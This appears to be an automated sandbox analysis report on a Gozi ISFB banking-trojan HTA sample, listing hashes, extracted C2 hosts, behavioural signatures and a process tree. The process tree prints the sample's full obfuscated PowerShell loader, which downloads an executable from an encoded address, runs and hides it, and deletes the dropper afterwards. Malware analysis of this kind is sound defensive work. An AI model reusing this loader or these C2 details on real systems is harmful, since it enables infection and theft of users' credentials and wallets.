Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05-08-2022 01:33

General

  • Target

    55.hta

  • Size

    12KB

  • MD5

    26ace4f34d7b5df03722125fe5280d4c

  • SHA1

    7b9e7c2c60e66ec42061752d707ab70c3c84187a

  • SHA256

    e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad

  • SHA512

    5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115

Malware Config

Extracted

Family

gozi_ifsb

Botnet

11111

C2

trackingg-protectioon.cdn1.mozilla.net

194.76.225.168

194.76.224.242

Attributes

  • base_path

    /fonts/

  • build

    250240

  • exe_type

    loader

  • extension

    .bak

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:876
      • C:\Users\Admin\AppData\Roaming\bartor.exe
        "C:\Users\Admin\AppData\Roaming\bartor.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4600
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4200
          • C:\Users\Admin\Downloads\WinZip.exe
            C:\Users\Admin\Downloads\WinZip.exe
            5⤵
            • Executes dropped EXE
            PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\SysWOW64\choice.exe
            choice /C Y /N /D Y /T 7
            5⤵
            PID:2200

Network

MITRE ATT&CK Enterprise v6

Downloads

    • C:\Users\Admin\AppData\Roaming\bartor.exe

      Filesize

      494KB

      MD5

      0f2be4fe0362766dcf339d4c03326bc4

      SHA1

      69e26e9e75e8a8359d232d8e14318b9235e1a828

      SHA256

      2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529

      SHA512

      8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

    • C:\Users\Admin\Downloads\WinZip.exe

      Filesize

      338KB

      MD5

      468042278a3e4841d3e33ccca10d99ca

      SHA1

      22532f37096a200d448420359c01bbebaaf6b820

      SHA256

      b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86

      SHA512

      4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

    • memory/876-139-0x0000000006900000-0x0000000006922000-memory.dmp

      Filesize

      136KB

    • memory/876-132-0x00000000055E0000-0x0000000005C08000-memory.dmp

      Filesize

      6.2MB

    • memory/876-136-0x00000000063D0000-0x00000000063EE000-memory.dmp

      Filesize

      120KB

    • memory/876-137-0x0000000007450000-0x00000000074E6000-memory.dmp

      Filesize

      600KB

    • memory/876-138-0x0000000006880000-0x000000000689A000-memory.dmp

      Filesize

      104KB

    • memory/876-130-0x0000000000000000-mapping.dmp

    • memory/876-140-0x0000000007AA0000-0x0000000008044000-memory.dmp

      Filesize

      5.6MB

    • memory/876-141-0x00000000086D0000-0x0000000008D4A000-memory.dmp

      Filesize

      6.5MB

    • memory/876-134-0x0000000005D10000-0x0000000005D76000-memory.dmp

      Filesize

      408KB

    • memory/876-133-0x0000000005430000-0x0000000005452000-memory.dmp

      Filesize

      136KB

    • memory/876-135-0x0000000005DF0000-0x0000000005E56000-memory.dmp

      Filesize

      408KB

    • memory/876-131-0x0000000002AC0000-0x0000000002AF6000-memory.dmp

      Filesize

      216KB

    • memory/2200-168-0x0000000000000000-mapping.dmp

    • memory/2668-151-0x00000000004E0000-0x00000000004EB000-memory.dmp

      Filesize

      44KB

    • memory/2668-147-0x0000000000000000-mapping.dmp

    • memory/2668-150-0x0000000000529000-0x000000000053A000-memory.dmp

      Filesize

      68KB

    • memory/2668-152-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/2668-153-0x0000000000610000-0x000000000061D000-memory.dmp

      Filesize

      52KB

    • memory/2668-156-0x0000000000529000-0x000000000053A000-memory.dmp

      Filesize

      68KB

    • memory/2668-157-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/3448-167-0x0000000000000000-mapping.dmp

    • memory/4200-146-0x0000000000000000-mapping.dmp

    • memory/4600-158-0x000000000BA70000-0x000000000C088000-memory.dmp

      Filesize

      6.1MB

    • memory/4600-159-0x000000000B4E0000-0x000000000B4F2000-memory.dmp

      Filesize

      72KB

    • memory/4600-160-0x000000000B610000-0x000000000B71A000-memory.dmp

      Filesize

      1.0MB

    • memory/4600-161-0x000000000B540000-0x000000000B57C000-memory.dmp

      Filesize

      240KB

    • memory/4600-162-0x000000000C090000-0x000000000C122000-memory.dmp

      Filesize

      584KB

    • memory/4600-163-0x000000000C2B0000-0x000000000C326000-memory.dmp

      Filesize

      472KB

    • memory/4600-164-0x000000000C470000-0x000000000C48E000-memory.dmp

      Filesize

      120KB

    • memory/4600-165-0x000000000CDE0000-0x000000000CFA2000-memory.dmp

      Filesize

      1.8MB

    • memory/4600-166-0x000000000D4E0000-0x000000000DA0C000-memory.dmp

      Filesize

      5.2MB

    • memory/4600-145-0x0000000000530000-0x00000000005B2000-memory.dmp

      Filesize

      520KB

    • memory/4600-142-0x0000000000000000-mapping.dmp